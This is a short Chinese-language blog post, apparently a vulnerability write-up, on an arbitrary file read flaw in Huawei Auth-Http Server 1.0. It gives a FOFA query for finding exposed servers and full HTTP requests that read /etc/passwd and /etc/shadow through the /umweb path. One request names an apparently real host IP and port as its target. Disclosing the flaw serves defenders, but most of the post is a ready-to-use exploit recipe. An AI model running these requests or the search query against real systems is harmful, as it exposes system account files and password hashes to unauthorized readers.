华为Auth-HTTP服务器任意文件读取漏洞

华为Auth-Http Server 1.0存在任意文件读取,攻击者可通过该漏洞读取任意文件。

1.漏洞级别

高危

2.漏洞搜索

fofa

server="Huawei Auth-Http Server 1.0"

3.漏洞复现

构造

GET /umweb/passwd HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close

即可成功获取数据
同理,构造

GET /umweb/shadow HTTP/1.1
Host: 60.23.25.42:8887
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close

这里的umweb路径等价于/etc,后面接文件的地址

/umweb/passwd = /etc/passwd
同理还可以访问
/umweb/shadow
/umweb/hosts等敏感文件

注:可惜的是这个漏洞无法跨越目录访问,只能在/etc目录下进行访问,因此利用价值相对有限,无法获得过多的敏感数据,属于是是个鸡肋漏洞了。

相关推荐
baozongwi1 小时前
CTF常用sql注入(一)联合注入和宽字节
数据库·sql·web安全
是小王同学啊~2 小时前
防止跨站脚本攻击XSS之Antisamy
web安全·xss
秦矜2 小时前
网络安全技术报告
网络·安全·web安全
未知百分百2 小时前
Django任意URL跳转漏洞(CVE-2018-14574)
后端·python·安全·web安全·网络安全·django·shell
javaer炒粉4 小时前
鸿蒙应用笔记
笔记·华为·harmonyos
Canon_YK4 小时前
超级加密狗——CBS(赛博锁)
服务器·网络·安全·web安全·网络安全
baozongwi4 小时前
ctfshow web sql注入 web242--web249
android·数据库·经验分享·sql·mysql·web安全
kali-Myon14 小时前
基于Cardinal的AWD攻防平台搭建与使用以及基于docker的题目环境部署
运维·学习·mysql·web安全·docker·容器·awd
鸿蒙自习室16 小时前
ArcTs布局入门04——相对布局 & 媒体查询
华为·harmonyos·鸿蒙·媒体